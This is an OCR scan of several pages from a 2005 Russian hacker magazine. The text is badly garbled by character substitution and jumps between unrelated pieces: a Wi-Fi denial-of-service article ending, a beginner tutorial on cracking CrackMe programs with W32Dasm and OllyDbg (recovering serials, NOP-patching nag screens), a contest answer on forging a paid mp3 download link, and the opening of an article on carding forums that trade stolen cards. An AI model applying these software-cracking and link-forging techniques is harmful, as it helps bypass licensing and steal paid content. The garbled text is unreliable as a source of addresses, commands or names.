$ ІІсопІід а]0 ир 

Осталось собрать утилиты, входящие в ЭйрДжек. 
Переходим в подкаталог /Іооіз каталога програм- 
мы, вводим таке, а затем еще и таке топкеущаск. 

[нереализованные атаки] Ряд атак на бес- 
проводные сети существует пока только в тео- 
рии. Не существует инструментов для их прове- 
дения (или просто мне об этом неизвестно, а кто- 
то вовсю уже досит этими способами, хотя, воз- 
можно, они так и останутся только в теории). 
Одна из нереализованных дос-атак на ѴѴІРІ со- 
стоит в изменении контрольных сумм (СРІС- 
32), посылаемых фреймам, в результате чего 
фрейм не принимается хостом. В то же время 
отправителю посылается поддельный фрейм о 
подтверждением успешного принятия фрейма, 
который на самом деле растворился в воздухе. 
Сложность реализации в этой атаке состоит в 
том, что нужно сгенерировать шум, точно в мо- 
мент передачи контрольной суммы (это по- 
следние четыре байта) фрейма. 

Подобную атаку предлагают использовать 
против сетей стандарта 802.1 1І. Только здесь 
необходимо исказить контрольную сумму, 
подтверждающую целостность сообщения 
(МІС — Меззаде Іліедгііу СІтеокзит) в прото- 
коле ТКІР. В стандарте определено, что если 
за одну секунду придет больше одного фрей- 
ма с неправильной МІС, то хост отсоединится 
на минуту, а затем присоединится к новому 
сеансовому ключу. 

[заключение] Хочу сказать, что написал да- 
леко не обо всех возможных видах ОепіаІ о1 
Зегѵісе, характерных для беспроводных сетей 
802.1 1 . Еще хочу оказать, что ОоЗ-атаки на се- 
ти — дело нехорошее, поэтому не стоит досить 
сетки только в отместку за то, что ты не смог в 
них проникнуть или оттого, что тебе просто не- 
чем заняться © 



ш 



05С-Т7 

самая тонкая камера в мире 




05С-Н1 

12х оптический зум 




О8С-890 

Технология 51;атіпа 
— более 420 снимков 
от одной зарядки 
аккумулятора 

/ 

зтагійдасідеі 

официальный дистрибьютор 
Телефон: (095) 540-88-24 
ѵѵѵѵѵѵ.зтаіТдасІдеІ;. ги 



ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕРВУМ НЬЮСЫ 






Крэкинг - это просто 

по КАКОЙ-ТО НЕПОНЯТНОЙ МНЕ ПРИЧИНЕ МНОГИЕ 
СЧИТАЮТ, ЧТО ВЗЛОМОМ ПРОГРАММ ЗАНИМАЮТСЯ 
ИСКЛЮЧИТЕЛЬНО КОМПЬЮТЕРНЫЕ ГУРУ, КОТОРЫЕ 
ДО МОЗГА КОСТЕЙ ПРОНИКЛИСЬ НИЗКОУРОВНЕВЫМ 
КОДИНГОМ и ПРИКЛАДНОЙ КРИПТОГРАФИЕЙ. НО КАК 
ТОЛЬКО ТКНЕШЬ ИХ НОСОМ, ПОКАЖЕШЬ ОТЛАДЧИК, 
РАЗЖУЕШЬ ВСЕ И РАЗЛОЖИШЬ ПО ПОЛОЧКАМ — 
УДИВЛЯЮТСЯ: «НЕУЖЕЛИ ВСЕ ТАК ПРОСТО, А?». 
ТВОЯ ОЧЕРЕДЬ! I Степан Ильин ака Зіер (1ад@геа1.хакер.ги) 






Первые шаги 

для начинающего крекера 

[геѵегаіпд] Начнем с самого простого. Что вообще нужно для того, что- 
бы взломать программу, обойти или убрать защиту, сгенерировать се- 
рийный код? Правильно — посмотреть исходный код программы и при 
необходимости видоизменить его. К сожалению, найти исходник к ком- 
мерческому продукту практически невозможно, поэтому приходится ид- 
ти по обходному пути. 

Как известно, любая программа (вернее сказать, исполняемый файл) пред- 
ставлена на компьютере в виде машинных команд. Эти команды понятны 
микропроцессору, но программировать с их помощью чрезвычайно слож- 
но: открой любой ЕХЕ-файл в НЕХ-редакторе, и ты сразу поймешь, что я 
имею в виду. Чтобы облегчить процесс программирования был изобретен 
специальный транслятор, который имеет примитивный набор команд и 
способен преобразовывать составленные из них конструкции в машинный 
код. Имя этого чудного изобретения — ассемблер. 

Понимаешь, куда я клоню? Если из ассемблерного листинга можно полу- 
чить машинный код, то вполне возможно и обратная операция. Действи- 
тельно любой исполняемый файл с той или иной точностью может быть 
представлен в виде ассемблерных команд — этой задачей, собственно, 
и занимаются дизассемблеры. Наиболее продвинутым дизассемблером 
по праву считается ЮА {ттт.ісіарго.ги), однако, для его использования 
требуется некоторый опыт. Для решения несложных и средних задач 
вполне достаточно менее функционального, но удобного — \Л/320азгп 
{\л/\л/\й/.ехраде.сот/раде/\й/32с1азт). 

Помимо дизассемблера нам потребуется еще и отладчик (дебаггер). Он 
также дизассемблирует исходный код программы (то есть включает в се- 
бя функции дизассемблера), но помимо этого позволяет еще и шаг за 
шагом, инструкцию за инструкцией, выполнить программу. Ты полно- 
стью контролируешь ход ее выполнения, при этом текущие ассемблер- 
ные команды всегда находятся у тебя перед глазами. Долгое время аб- 
солютным лидером среди отладчиков был ЗоШсе, сейчас же многие на- 
чали использовать ОІІуОВѲ {ттѵѵ.оІІусІЬд.сІе). Это 32-битный низкоуров- 






На нашем диске ты най- 
дешь все упомянутые в 
статье утилиты, плагины к 
ОІІуОВв, а также коллек- 
цию стасктпев от ІапЮтп'а. 




Перед чтением статьи я на- 
стоятельно советую прочи- 
тать статьи из «Кодинга», 
посвященные ассемблеру. 
Это существенно облегчит 
и ускорит понимание мате- 
риала. 



невыи отладчик с продуманным ин- 
терфейсом и полезными функциями, 

которые существенным образом облегчают процесс отладки. В ОІІуОВО 
встроен специальный анализатор, который распознает и визуально 
обозначает процедуры, циклы, константы и строки, внедренные в код, 
обращение к функциям АРІ, параметры этих функции и т.п. Для новичка 
(и не только) — это именно то, что надо! 



[с чего начать?] Начиная заниматься крэкингом, будь рассудите- 
лен. Мой тебе совет: не спеши брать быка за рога и сразу браться за 
взлом добротной софтины с продуманной защитой. Без соответствую- 
щего опыта у тебя все равно вряд ли что-то получится. Скорее всего, 
ты просто закинешь это неблагодарное занятие, одновременно о этим 
потеряв всякий интерес к теме. Начинать, как известно, надо о про- 
стого: здесь будет и понимание, и интерес, и самое главное — толк. 
Можно, например, зайти на птт.сіотпіоасіз.сот и накачать пару де- 
сятков сомнительных программ, типа СуперЗвонилки, ГиперБлокнота 
и т.д. — среди них, наверняка, найдутся экземпляры с примитивной 
защитой. Но я тебе рекомендую начать с так называемых крякмисов 
(сгаскгпе) — специальных заданий для взломщиков. Многие из них на- 
писаны специально для новичков, о чем указано в описании, поэтому 
идеально подойдут для обучения. Вдобавок многие репозитарии кряк- 
мисов (например, ѵ\/\л/\А/.сгаскте$.сІе) выкладывают еще и туториалы 
(инструкции по прохождению), поэтому ты сможешь сравнить свой и 
авторский подходы взлома или же найти подсказку на пути к верному 
решению. Идеальный вариант для новичков — серия крякмисов от 
РаМЮт'а (ѵѵтт.сгасктез.сІе/ивегзДапІОтДапЮтсоІІесІіоп). Ее и рас- 
смотрим: для лучшего усвоения рекомендую выполнять действия па- 




раллельно со мной. 

Только в этом случае 
ты будешь понимать, 
о чем я говорю :). 

[немного теории] 

Возьмем первый кряк- 
мис из коллекции — 

РаМЮт'з СгаскМе #1 . В 
задании требуется най- 
ти серийник, при этом 
используя исключитель- 
но дизассемблер. Ис- 
пользовать дебаггер по 
условию запрещено, но 
он, собственно, и не 
требуется. Посмотрим, 
что собой представляет 
программа: обычное окно с текстовым полем для ввода. После ввода случай- 
ного значения (например, слова «хакер»), появляется всплывающее окно о 
ошибкой ѴѴгопд раззѵѵогсі. Кеер Ігуіпд, уои'ІІ деі І1!. От этого, собственно, мы и 
будем крутиться. Текстовые строки информационных сообщений зачастую 
хранятся в самом коде программы. Соответственно, еЕсли найти обращение к 
строке, то без труда найдется и вызов функции вывода сообщения, а там уже 
и процедура проверки серийника недалеко. Попробуем разобраться во всем 
более подробно. 

В общем случае программа состоит из трех областей памяти (сегментов): 
сегмента кода (СЗ), сегмента данных (08) и сегмента стека (33). В пер- 
вом, как ты понял, хранится непосредственно код программы, то есть ко- 
манды и командные инструкции. Второй сегмент предназначен для хране- 
ния данных (переменных, констант и т.д.) — по идее, выданное програм- 
мой сообщение располагается именно там. Сегмент отека представляет 
собой специальную область памяти, предназначенную для временного 
хранения данных, например, параметров, передаваемых процедурам и 




функциям. Слово «стек» подразумевает использование принципа РІЕО 
(РІГЗІ Іп — Разі Оиі, «первым пришел — последним вышел»). Последнее 
занесенное в стек (командой РУЗРІ) значение, будет извлечено (коман- 
дой РОР) первым, предпоследнее — вторым и т.д. Можно наглядно пред- 
ставить себе это, вообразив колоду карт. 

Если ты знаком о программированием под ѴѴІпбоѵѵз, то должен знать, что 
стандартное окно с сообщением чаще всего выводится с помощью спе- 
циальной АРІ-функции МеззадеВохА. Сама строка сообщения и прочие 
параметры окна помещаются в стек, откуда позже извлекаются и обра- 
батываются функцией (это самый распространенный способ передачи 
параметров функции в языке ассемблер). Получается, что после ввода 




коллекция всевозможных сгасктез — отлич- 
ная возможность попрактиковаться во взломе, 
не нарушая закон 



[хакер 08 [80] 05 > 









[хакер 08 [80] 05 > ВЗЛОМ 072 ] 



неправильного (ты же не думаешь его угадать, верно?) серийника, про- 
грамма загружает в стек адрес строки и вызывает функцию МеззадеВо- 
хА. ѴѴ32Вазт, как и многие другие дизассемблеры, умеет показывать, 
где именно происходит обращение к той или иной строке. Это значитель- 
но облегчает поиск нужного фрагмента кода: достаточно в дизассембли- 
рованном листинге произвести поиск текста сообщения, и мы сразу най- 
дем нужный вызов функции МеззадеВохА. В большинстве случаев где- 




РаМЮт'з СгаскМе #1 : после ввода неправильного серийника появляется 
сообщение об ошибке 




ОІІуОВО подобно ѴѴ320азт'у тщательно следит за использованием текстовой информации 



манды в шестнадцатеричном виде (машинные коды), ризіт 00403045 — 
непосредственно сама ассемблерная команда. Она помещает в отек 
адрес 00403045, по которому, судя по комментарию ѴѴ320азт'а, хра- 
нится наша строка. 

По нашему предположению после загрузки адреса строки в стек, проис- 
ходит вызов функции, выводящей сообщение на экран. Так и есть — 
смотрим ниже: 

* Веіегепсе То: ІІ8ЕРІ32. МеззадеВохА, Оггі:01ВВ(і 
:00401 2А9 Е85С000000 СаІІ 00401 ЗОА 

ѴѴ320азт нам явно указывает, что команда вызова функции СаІІ вызы- 
вает именно АРІ-функцию вывода окошка (МеззадеВохА). Теперь смо- 
трим, что происходило до вызова этой функции. Сразу бросается в гла- 
за следующий код: 

00401291 СаІІ 00401352 
00401296 стр еах, 00000000 
00401299 іе 00401 2В0 

«Да вот прямо он мне так в глаза и бросился, по-моему, ничем не отлича- 
ется от всего остального», — возможно, грустно подметишь ты. 

На самом деле это довольно стандартная конструкция — запомни ее. 
В 90% случаев это и есть код проверки серийника. Сначала вызыва- 
ется некоторая процедура, которая сравнивает введенный пользова- 
телем и правильный код, и по результатам проверки устанавливает 
нужное значение регистра ЕАХ. После этого о помощью команды 
СМР производится сравнение значения реги- 
стра с 0. Если они равны ()е — )итр едиаі — 
перейти, если равно), осуществляется пере- 
ход на адрес 00401 2В0. Давай посмотрим, 
что находится по этому адресу — нажми 
ЗИІИЧ-Р12 и в появившемся окошке введи 
этот адрес. Ого! Появившийся фрагмент кода 
в точности повторяет код вывода сообщения 
на экран. Разница лишь в том, что вместо со- 
общения о неправильном коде, выводится 
надпись Ѵоц доі 11! Уоиг поѵѵ а сгаскег!. Отсю- 
да вывод: вызванная ранее процедура дей- 
ствительно осуществляет проверку серийных 
кодов. Если пользователь ввел правильный 
пароль, то значение регистра ЕАХ становит- 
ся равным о, и управление передается проце- 
дуре вывода сообщения об успехе. В против- 
ном случае в регистр ЕАХ записывается 1, и 
никакого перехода не происходит. Далее по 
коду расположен вызов МеззадеВохА о сооб- 
щением об ошибке, который и выполняется. 

В нашем случае все еще проще. Функция про- 
верки является стандартной функцией сравне- 
ния двух строк ІзІгсотрагеА, которой через 
стек передаются два параметра: 



нибудь рядом располагается и процедура проверки серийника. Наша за- 
дача — с помощью дизассемблера посмотреть правильный пароль во 
время сравнения его со введенным. 

[взлом серийника] Запускай ѴѴ320азт, далее меню ОІззетЫег -> Ореп 
Р!1е и выбирай файл СНАСКМЕ1 .ЕХЕ. Ву-а-ля! Перед тобой полностью ди- 
зассемблированный код программы, но и в нем еще нужно разобраться. 
Наша цель — найти ту часть кода, которая каким-то образом использует 
обозначенную выше строку. Самый банальный способ — провести поиск 
строки (меню Зеагсб -> РІпсі Нехі), но есть и другой вариант. Дело в том, что 
\Л/320азт записывает все найденные обращения к строковым данным в 
специальный список (меню Ріеіз -> Зігіпд Оаіа Ріеіегепсез). Поэтому вместо 
поиска можно просто выбрать из списка нужную строку и дважды кликнуть 
по ней мышью. Так или иначе, \Л/320азт автоматически переведет тебя на 
следующий код: 

* РоззІЫе ЗІгІпдОаІа Веіігот Оаіа ОЬ) ->"ѴѴгопд РаззѵѵогсІІ Кеерігуіпд, 
уои1І деі ІИ" 

00401 2А2 6845304000 ризіі 00403045 

Комментарий указывает на то, что в следующей команде происходит 
обращение к нужной строке — ѴѴгопд раззѵѵогб. Кеер ігуіпд, уои'ІІ деі II!. 
Разберем эту команду более подробно: 00401 2А2 — это адрес, где в 
памяти находится данная команда, 6814654100 — представление ко- 



:00401 287 689С304000 ризИ 0040309С 

* РоззІЫе 81гІпд0аІа Веіігот Оаіа ОЬ] ->"т0ШаР-ЕтКСАВс" 

:00401 28С 6829304000 ризИ 00403029 

* Веіегепсе То: КЕВNЕ^32.Iз1^стрА, 0гс1:02061і 
00401291 Е8ВС000000 СаІІ 00401352 

Первой командой ризіт в стек заносится адрес введенной нами строки, а 
второй — настоящий серийник. \Л/320азт любезно подсказал, что по это- 
му адресу находится строка тОІМаР-ЕтКСАРс. Это и есть серийник :). 

[убираем наги] Наг — это назойливое окошко, которое присуще лю- 
бой триальной программе. Смысл окошка — напомнить пользователю 
о том, что программисты тоже любят кушать, поэтому покупка про- 
граммы была бы очень кстати. Общий принцип таков. Во время запу- 
ска приложения, осуществляется простая проверка — зарегистрирова- 
на ли программа или нет. Индикацией того, что приложение зареги- 
стрировано, может быть наличие некоторого файла, ключа реестра 
или, что более вероятно, определенное их содержание. Если в резуль- 
тате проверки окажется, что прога уже зарегистрирована, то никакого 
наг-окна не выводится, и программа продолжает обычную работу. В 
противном случае управление передается процедуре, которая выводит 
наг на экран и в большинстве случаев требует нажатия клавиши для 
продолжения работы. 

Как правило, убрать наг-окно не представляет труда, в этом можно 







легко убедиться на примере РаМЮт'з СгаскМе #2. После запуска про- 
ги пользователя одаривают не одним, а сразу двумя наг-окошками, но 
задача от этого практически не усложняется. К сожалению, возмож- 
ность регистрации не предусмотрена, поэтому единственное, что ос- 
тается сделать, — это вручную убрать из кода «лишние» фрагменты 
программы. Или точнее говоря, вызовы процедур, выводящих на 
экран эти назойливые сообщения. В принципе это можно сделать с 
помощью дизассемблера и НЕХ-редактора, но удобнее и уместнее 
все-таки использовать отладчик (или и то, и другое одновременно) — 
скоро ты в этом убедишься. 

Итак, запускай ОІІуОВѲ, а с помощью меню открой файл СВАС- 
КМЕ2.ЕХЕ. В принципе, найти нужный фрагмент кода, содержащий 
вызовы «лишних» процедур, можно по описанному ранее алгоритму. 
Для этого нужно кликнуть правой мыши в окне с ассемблерным ко- 
дом и в контекстном меню выбрать пункт Веагсб (ог -> АН геіегепсесі 
(ехГ зігіпдз. В появившемся списке ты сразу же увидишь текст сооб- 
щения, выводимый в окне нага, а двойным кликом — сможешь пе- 
рейти туда, где он используется. Но мы пойдем по другому пути и 
изучим еще один ключевой прием, который активно используется во 
время взлома программ. 

Если ты уже когда-то пробовал ломать программы, то, наверняка, слы- 
шал о так называемых брейкпоинтах (Ьгеакроіпіз). Брейкпоинт — это 
место останова программы, то есть точка, в которой программа прио- 
станавливает свое выполнение и указывает адрес текущей команды в 
отладчике. Использовать этот чрезвычайно полезный прием очень 
просто. Нам уже известно, что небольшое окошко о сообщением лег- 
ко может быть выведено на экран о помощью функции МеззадеВохА. 
Теперь все, что от нас требуется — установить точку останова на вы- 
зове этой функции, а после остановки программы всего лишь «выре- 
зать» из кода ее вызов. Попробуем? 

Если ты правильно установил ОІІуОВѲ и подключил чрезвычайно полез- 
ный плагин СотгпапгіВаг, то в нижней части экрана должно светиться ок- 
но для ввода команды. 

Введем команду для установки точки останова на вызове функции Мез- 
задеВохА: Ьрх МеззадеВохА. Правильность установки брейкпоинта мож- 
но проверить в окне Вгеакроіпіз (меню Ѵіеѵѵ -> Вгеакроіпіз). Там же его 
можно на время деактивировать, или вовсе удалить. Далее необходимо 
запустить программу из отладчика — для этого нажми клавишу Р9 или 
выбери в меню ОеЬид -> Нип. Программа сразу же остановилась на ко- 
манде о адресом 00401 ООЕ: 

0040100Е САН <ЛѴІР.&и8ЕРІ32.Ме88адеВохА> ; \Ме88адеВохА 




-> Не(егепсез): после установки 
первого брейкпоинта сюда запи- 
сался список всех вызываемых 
программой функций. С базовыми 
знаниями АРІ (или мануалом под 
рукой) можно предположить, что 
второй наг выводится с помощью 
функции ОіаІодВохРагатА. Пред- 
лагаю проверить тебе это самому. 

Все изменения можно вручную 
внести через НЕХ-редактор, с по- 
мощью которого байты по нужным адресам перезаписать числом 90. 
Или же автоматически записать все изменения с помощью самого ОІ- 
ІуОВѲ: правый клик по исправленному ассемблерному коду, меню Сору 
(о ЕхесиІаЫе -> АН тобКІсаІІопз. 



В Ю20авт‘е могут быть 
проблемы со шрифтами. 
Для устранения проблемы 
выбери меню ОізаззетЫет - 

> Ы -> Зеіесі Вопі и уста- 
нови шрифт Соитіет (полу- 
жирный, размер 8). После 
этого настройки нужно сох- 
ранить: меню ОізаззетЫет - 

> Ы -> 8аѵе ОеіаиІІ Вопі. 



[защита: имя-серийник] Доселе мы рассматривали самую примитив- 
ную защиту. РаМЮт'з СгаскМе #4 представляет собой более сложную за- 
дачу. Требуется найти не просто серийник, а регистрационный номер, кото- 
рый зависит от введенного имени пользователя. Другими словами, он ге- 
нерируется по определенному алгоритму. Такой подход используется в 




Мы получили то, что хотели — программа оста- 
новилась до вызова функции МеззадеВохА. 

Если ты выполняешь действия параллельно со 
мной, то, наверняка, приятно удивлен, что СІ- 
ІуВВѲ приводит расшифровку параметров, ко- 
торые передаются этой процедуре. Счень на- 
глядно и удобно. 

[нет операции] Теперь разберемся, как этот 
вызов можно убрать. В этом нам поможет спе- 
циальная инструкция ассемблера — «нет опе- 
рации» (МСР). Для того, чтобы убрать вызов 
процедуры (или любой другой код), достаточно 
забить его машинный код командами МСР. В 
результате в программе образуется своеоб- 
разная «дырка», но на работоспособность она 
ни коем образом не повлияет. Правда, здесь 
есть один нюанс. Машинный эквивалент ко- 
манды МСР (в шестнадцатеричном предста- 
влении — 90) занимает один байт, в то же вре- 
мя машинная команда, вызывающая функцию 
МеззадеВохА (Е8 С5010000), — целых 5. Нес- 
оответствия быть не должно, и чтобы полно- 
стью перекрыть исходную команду нужно ис- 
пользовать команду МСР 5 раз. К счастью, СІІуОВѲ полностью избав- 
ляет нас от лишнего геморроя. Кликни правой кнопкой мыши на стро- 
ке, где произошла точка останова, и выбери в меню ВІпагу -> РІІІ ѵѵііб 
МСРз. Стладчик самостоятельно заполнит команду МСР'ами нужное 
число раз. Теперь можно продолжить выполнение программы — на- 
жимаем Р9. Сразу выясняется две новости: одна хорошая, другая — 
нет. Начну с хорошей: первый наг-скрин мы убрали. Плохая новость 
заключается в том, что другой наг остался на месте. Почему? Види- 
мо, он отображается с помощью другой АРІ-функцией, на которую 
брейкпоинт не установлен. Не беда. Сткрываем окно Веіегепсез (Ѵіеѵѵ 




ЛИСТИНГ процедуры для генерации регистрационного номера 



Не стоит забывать, что 
все действия взломщиков 
противозаконны и эта 
статья предназначена 
лишь для ознакомления. 
За применение материала 
в незаконных целях автор 
и редакция ответственно- 
сти не несут. 





\л/ш.сгаскІаЬ.ги — ведущий 
ресурс по взлому программ 
в России. Рекомендую, 
ѵѵш.сгасктез.сіе — 
огромное количество все- 
возможных сгасктез. 
ѵ\/ш.каІазбпіко^.ги — для 
тех, кто хочет выучить азы 
ассемблера. 



[хакер 08 [80] 05 > ВЗЛОМ 073 ] 













[хакер 08 [80] 05 > ВЗЛОМ 074 ] 




ЕшвагЕв: 



-ШІ ХІ 



ОІІуОВѲ по умолчанию не поддер- 
живает командную отроку. При- 
дется подключить плагин Стсі^іпе 
(тѵѵт.оІІусІЬд.сІе) 




бі9^ и п1 

Исі4сіл94пмі^тІ ІгнЫгл', г#іЬ1. 

ітріСіь «« Ф ІГЧ4« МЧ1 1 П? I 



П^І ііі'Vі^ ПУН 



Е 



А 



■ 

Р \ Нйпинв'інН 



№ 



сработала точка останова! 



большинстве программ, поэтому особенно актуально будет рассмотреть 
именно его. Вначале схема стандартна: открываем программу в ОІІуОВѲ, 
устанавливаем бряку на МеззадеВохА и запускаем программу клавишей 
Р9. После ввода полей (например, зІер/123) нажимаем на кнопку Сбеск и 
попадаем в отладчик. Перед нами уже знакомый код вывода сообщения на 
экран о текстом ѴѴгопд ЗегіаІ! Кеер Ігуіпд, уои'ІІ деі І1! Непорядок! Посмо- 
трим, что было чуть ранее: сначала идет код вывода сообщения об успеш- 
ной регистрации, а еще выше — инструкция, похожая на вызов процедуры 
проверки регистрационного номера. Если ты внимательно читал статью с 
самого начала, то она должна быть тебе уже знакома: 

00401236 СА11СВАСКМЕ4.004012Р9 

0040123В СМРЕАХ.О 

00401 23Е ЗЕ 8Н0ВТ СВАСКМЕ4.00401255 

По логике вещей в процедуру проверки (а также генерации) регистрацион- 
ного ключа должны передаваться параметры. Как минимум: введенные 
пользователем имя пользователя и ключ. Так и есть: 

00401205 ри$н 

00401 20А ри$н СВАСКМЕ4.00403084 ;адрес буфера 

00401 20Е РУЗНЗЕЗ 

00401214 Ри$Н ОѴѴОРО РТР 88:[ЕВР+8] 

00401217 САЕЕ <ЛѴІР.&и8ЕР32.0еШІдІ1етТех1А>;0еШІдІ1етТех1А 
00401 21 С РУВНЮО 

00401221 РУ8Н СРАСКМЕ4.00403184 ;адрес буфера 

00401226 Ри8НЗЕ9 

0040122В РУ8Н ОѴѴОРО РТР 88:[ЕВР+8] 

0040122Е САЕЕ<ЛѴІР.&и8ЕР32.6еШІдІ1етТех1А> ;0еШ1д11етТех1А 

Вызванная дважды АРІ-функция ѲеШІдІІетТехГА извлекает значения тек- 
стовых полей и помещает их значения в буферы, адреса которых переда- 
ются в функции в виде параметров. Далее будем действовать по вполне 
стандартной схеме: поставим брейкпоинт на ѲеЮІдІІетТехТ Программа в 

этом случае будет остановлена 
еще ДО генерации и проверки ре- 
гистрационного кода. А значит, мы 
сможем проследить за этим про- 
цессом и подсмотреть правильно 
сгенерированный номер с помо- 
щью отладчика. 

Перезапускаем программу (для 
этого удобно использовать горячую 
клавишу — С4ГІ+Р2), да- 
лее о помощью окна 
Вгеакроіпіз удаляем 
поставленные ранее 



наги — это назойливые всплывающие окошки, которые присуще множе- 
ству коммерческих программ 



бряки на МеззадеВохА и устанавливаем новую точку останова на ѲеЮІдІ- 
(егпТехГА (Ьрх ѲеЮІдІІетТехІА). Теперь запускаем (клавиша — Р9) и вво- 
дим в текстовые поля произвольные значения. Программа остановится на 
первом вызове этой функции: 

00401217 САЕЕ<ЛѴІР.&и8ЕВ32.С1еШІдІІетТехІА> ;СеШ1д11етТех1А 

Отсюда начинаем выполнять программу пошагово. Для этого в ОІІуОВѲ 
предусмотрены два варианта: трассировать с заходом в подпрограммы 
(клавиша — Р7) или трассировать без захода в подпрограммы (Р8). Курсор 
сейчас установлен на вызове АРІ-функции. РІас совершенно не интересует 
алгоритм ее работы, поэтому трассируем команду без захода в подпро- 
грамму. Значительно интереснее ее результат. Как уже было сказано, 
ѲеЮІдІІетТехІА заносит в буфер строковое значение, которое пользова- 
тель ввел в текстовом поле. Это легко проверить. В параметрах процедуре 
передается адрес начала буфера — 00403084. Давай посмотрим, что было 
размещено в нем после выполнения команды. Для этого нажми правой 
кнопкой мыши по нижней части окна СРП, где расположен дамп данных, и 
в появившемся меню выбери Ѳо Іо -> Ехргеззіоп. После ввода нужного ад- 
реса, программа высветит данные, которые расположены по этому адресу. 
У меня это строка — «зіер». 

Двигаемся далее. Аналогичным образом трассируем программу вплоть до 
вызова процедуры СНАСКМЕ4.004012Р9. Поскольку она, скорее всего, и 
выполняет генерацию серийника, трассируем эту команду с заходом в про- 
цедуру. Первые 2 десятка команд описывают алгоритм, по которому произ- 
водится генерация серийника. Это очень простой алгоритм, но привести 
его код здесь не смог — рискую гонораром. Зато я полностью откомменти- 
ровал его и выложил о исходником кейгена на диск. 

Сейчас нас интересует другое — сравнение сгенерированного и введенно- 
го нами серийника. Трассируем программу до следующего кода: 

00401334 РУ8Н СРІАСКМЕ4.00403284 ; 8ігіпд2 = ТМХГ' 

00401339 РУ8Н СВАСКМЕ4.00403184 ; 81гіпд1 = "за" 

0040133Е САЕЕ <ЛѴІР.&КЕРІМЕЕ32.Із1гстрА> ; ІзІгсотрагеА 

Оказалось, что в результате работы алгоритма, сгенерированный серийник 
был записан по адресу 00403284. Теперь с помощью уже знакомой функ- 
ции ІзІгстрА производится сравнение его значения о оерийником, который 
ввел пользователь. Чтобы не заставлять пользователя вручную просматри- 
вать значение, расположенное по адресу 00403284, ОІІуОВѲ любезно вы- 
вел его справа в комментариях. «ЕМХІ» — это и есть правильный регистра- 
ционный номер для имени «з4ер». Можешь это проверить :). 

[это не конец] Естественно, мы рассмотрели самые примитивные типы 
защит. Однако даже этих основ порой достаточно, чтобы взломать плохо 
защищенные программы. Надеюсь, ты убедился, что для этого совершен- 
но не обязательно идеально владеть ассемблером. В большинстве случаев 

вполне достаточно знания азов и 



работающих извилин в голове. Если 
тебе интересна тема взлома про- 
грамм — пиши. И мы обязательно 
расскажем тебе о том, как взломать 
более сложные защиты и упакован- 
ные программы, как обойти антиот- 
ладочные приемы программистов и 
многое другое © 



стандартная защита: регистрационным номер 
зависит от пользовательского имени 




список брейкпоинтов 















ХСОМТЕЗТСОММЕМТ8 

зИІуиИа 




В предыдущем конкурсе тебе на- 
до было купить хитрым способом 
трЗ-музыку. Это можно было 
сделать двумя способами. Пере- 
вести на кошелек 40 ѵѵтг или по- 
работать головой. Если порабо- 
тать головой, то надо было сде- 
лать следующее. Когда ты реги- 
стрируешься на сайте, то тебе 
становится доступен один бесп- 
латный трЗ-трек, который ты 
можешь скачать. А тебе надо 
слить второй трек. Чтобы его 
скачать, надо было посмотреть, 
как генерируется ссылка для 
первого. Тут все довольно прос- 
то. Ссылка состоит из двух час- 
тей. Первая часть — текущий 
час, день, год в формате, кото- 
рая выдает команда регГа 1іте(). 
Вторая часть — тс15_бех от име- 
ни файла без заголовка .трЗ. 
Сплюсовываешь результат и по- 
лучаешь рабочую ссылку. Вот та- 
кие дела. Победителями стали 
следующие товариши: ѵаіепок 
(ѵаІепок@сот(ѵ.ги), даІозНа (уапі- 
21 о@уапбех.ги) и ѵавіііу. 

Ну, а теперь о том, что тебя ждет в 
следующем месяце. Вот скажи 
мне, злоупотреблял ли ты когда- 
нибудь алкоголем? Думаю, что бы- 
вало такое. Тебе ли не знать, как 
иногда бывает плохо по утрам пос- 
ле того, как ты всю ночь зажигал с 
друзьями, которые по утру расска- 
зывают, что в пьяном угаре ты за- 
чем-то съел хомячка и для пущей 
важности показывают кровавые 
ошметки. Но это еще фигня, быва- 
ет и такое, что не успеваешь ты 
прийти в себя и выпить аспирину, 
как к тебе с повесткой в армию 
приходит чухан в погонах. «Все, 
парень, к пяти — на сборный пункт. 
С вещами, но много не бери». 
Пробухал все лето? Забыл посту- 
пить в институт? Семь двоек в ат- 
тестате? Отлично. Одним защит- 
ником Родины стало больше. 
Перспективы, согласись, не из при- 
ятных. Но нельзя опускать руки, ты 
же хакер! Как выйти из задницы — 
читай на сайте ѵѵѵѵѵѵ.расіопак.ги. 
Выйдешь из нее первым — еще и 
приз получишь. Так что кончай ха- 
лявить, пришло время взламывать! 
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КАК ИЗВЕСТНО, В СЕТИ МОЖНО 
НАЙТИ ФОРУМ ПО ЛЮБОМУ ИНТЕ- 
РЕСУЮЩЕМУ ВОПРОСУ. ДАЖЕ ФА- 
НАТЫ РАЗВЕДЕНИЯ МАЛЕНЬКИХ 
ПАУЧКОВ-КРЕСТОВИЧКОВ И ТО 
ИМЕЮТ КУЧУ ПОСТОВ ПО ИНТЕРЕ- 
САМ. КОНЕЧНО, И КАРДЕРЫ НЕ 
СТАЛИ ИСКЛЮЧЕНИЕМ. О ТОМ, 
КАК И ГДЕ ПРЕДСТАВИТЕЛИ ЭТОЙ 
ПРОФЕССИИ ОБМЕНИВАЮТСЯ ИН- 
ФОРМАЦИЕЙ И ДЕЛАЮТ СВОИ ДЕЛА 
И ПОЙДЕТ РЕЧЬ В ЭТОЙ СТАТЬЕ I 

N30 (п5й@П5й.ги) 



[ Іогишз] Несмотря на то, что в Сети существует 
великое множество таких форумов, разговор на 
них идет об одном и том же — люди обсуждают 
тонкости реализации технологии обналичивания 
банковских аккаунтов, предоставляющих своим 
клиентам онлайн-доступ к управлению счетом, 
методы вывода денег с краденых учетных запи- 
сей различных платежных систем, способы обла- 
пошивания наивных буржуев на онлайн-аукцио- 
нах США. Немалое количество хакеров пользуют- 
ся кардерскими форумами в качестве торговой 
площадки, на которой можно свободно продавать 
скоммунизженные номера кредиток, пароли от 
весьма ценных акков аукциона еЬау и прочие пло- 
ды криминальной кибер-деятельности. Практи- 
чески на всех таких форумах можно встретить 
объявления о предоставлении спамерских услуг, 
приватных прокси-, ѴРМ- и ООоС-сервисах. 

По большому счету, все кардерские форумы мож- 
но разделить на две категории: приватные и пуб- 
личные. Чтобы читать или создавать топики на 
риЫіс-форумах кардиологов, достаточно лишь за- 
регистрироваться там. Думаю, ты прекрасно пони- 
маешь, что кидалам ничего не мешает продавать 
там свои несуществующие товары, а дилетантам 
засорять форум тупыми вопросами и абсурдными 
предложениями. Чтобы оградить себя от рипперов 
